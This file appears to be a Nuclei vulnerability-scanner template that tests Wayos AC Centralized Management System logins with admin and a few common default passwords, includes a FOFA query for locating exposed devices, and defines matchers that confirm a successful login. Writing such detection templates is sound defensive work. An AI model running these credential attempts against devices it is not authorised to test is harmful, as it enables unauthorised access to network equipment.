id: ac-default-login

info:
  name: AC Centralized Management System - Default password
  author: SleepingBag945
  severity: high
  description: |
    AC Centralized Management System default login credentials were discovered.
  reference:
    - https://github.com/Ershu1/2021_Hvv/blob/main/Wayos%20AC%E9%9B%86%E4%B8%AD%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%BC%B1%E5%8F%A3%E4%BB%A4.md
    - https://github.com/chaitin/xray/blob/master/pocs/secnet-ac-default-password.yml
  metadata:
    verified: "true"
    max-request: 1
    fofa-query: 'title="安网科技-智能路由系统"'
  tags: WAYOS-AC集中管理平台

http:
  - raw:
      - |
        POST /login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{ password }}&Submit=%E7%99%BB%E5%BD%95

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
        - 123456
        - 12345678
        - password
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "ac_userid=admin"
          - "ac_passwd="
        condition: and

      - type: word
        part: body
        words:
          - "window.open"
          - "text/javascript"
        condition: and

      - type: status
        status:
          - 200

# digest: 490a004630440220063d6ba0a1de60cacd6425097a9e024a4819185f53e86397fe012e5fca8bb8b50220769e954bfd9ed06e6090d25be2bae60e790f60d9b473768dd4b849a0e865444b:922c64590222798bb761d5b6d8e72950
